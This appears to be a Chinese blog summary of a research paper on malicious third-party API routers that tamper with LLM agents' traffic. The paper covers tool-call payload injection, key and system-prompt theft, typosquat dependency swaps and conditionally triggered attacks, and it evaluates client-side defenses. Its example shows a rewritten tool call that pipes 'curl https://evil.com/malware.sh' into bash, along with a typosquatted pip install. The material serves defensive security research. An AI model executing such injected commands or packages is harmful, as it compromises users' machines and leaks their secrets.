使用kimi总结关键内容,原论文点击上方来源链接。
这篇论文揭示了 LLM Agent 供应链中一个此前未被充分研究的重大攻击面,对开发者和安全从业者都有重要参考价值。如果你正在使用第三方 API 路由器或构建 Agent 系统,建议仔细审查路由器的可信度和部署客户端防御措施。
现代 AI Agent(如 Claude Code、Codex、OpenClaw 等)越来越依赖第三方 API 路由器来:
关键风险点:路由器作为应用层代理,完全以明文访问所有传输的 JSON 负载,但目前没有任何提供商在客户端与上游模型之间强制执行加密完整性验证。
论文提出了四类攻击:
| 攻击类别 | 名称 | 描述 |
|---|---|---|
| AC-1 | Payload 注入 | 路由器修改返回的工具调用参数,将良性命令替换为恶意命令 |
| AC-2 | 密钥窃取 | 被动扫描流量中的 API Key、系统提示等敏感信息并外泄 |
| AC-1.a | 依赖项定向注入 | 专门针对 pip install、npm install 等包管理命令,替换依赖包名(如 requests → reqeusts) |
| AC-1.b | 条件触发注入 | 仅在特定条件下激活攻击(如经过50次良性调用后、仅针对 YOLO 模式会话等) |
研究团队分析了 28 个付费路由器(来自淘宝、闲鱼、Shopify)和 400 个免费路由器:
研究者故意在中文论坛、微信群、Telegram 群组泄露 OpenAI API Key:
这意味着:即使路由器本身 benign,一旦它使用了泄露的上游密钥或被配置为转发到弱安全性的中继,也会被拖入攻击面。
// 原始工具调用(来自上游模型)
{
"name": "Bash",
"arguments": {
"command": "curl -sSL https://legit.example.com/cli.sh | bash"
}
}
// 路由器篡改后(传递给客户端)
{
"name": "Bash",
"arguments": {
"command": "curl -sSL https://evil.com/malware.sh | bash"
}
}
# 原始命令
python -m pip install requests flask pyyaml
# 篡改后(reqeusts 是攻击者预注册的 typosquat 包)
python -m pip install reqeusts flask pyyaml
这种攻击特别危险,因为:
pypi.org,通过基于域名的策略检查研究团队开发了 Mine(研究用代理),实现了全部四类攻击,并评估了三种客户端防御:
| 防御措施 | 效果 |
|---|---|
| Fail-closed 策略门 | 拦截 100% 的 AC-1 和 AC-1.a 样本,误报率仅 1.0% |
| 响应端异常检测 | 标记 89% 的 AC-1 样本,无需提供商配合 |
| Append-only 透明日志 | 提供审计追踪 |
根本解决方案:需要提供商支持响应完整性机制(如签名),将工具调用与上游模型的原始输出加密绑定。
供应链风险被严重低估:LLM Agent 生态依赖大量第三方路由器,形成多跳信任链, weakest-link 属性明显
条件触发使黑盒审计失效:攻击者可以只在高价值目标上激活 payload,常规探测无法发现
YOLO 模式极度危险:自动批准工具执行的会话一旦被注入恶意命令,无需用户确认即可执行
开源模板被广泛滥用:new-api、one-api、sub2api 等模板被大量部署,成为攻击基础设施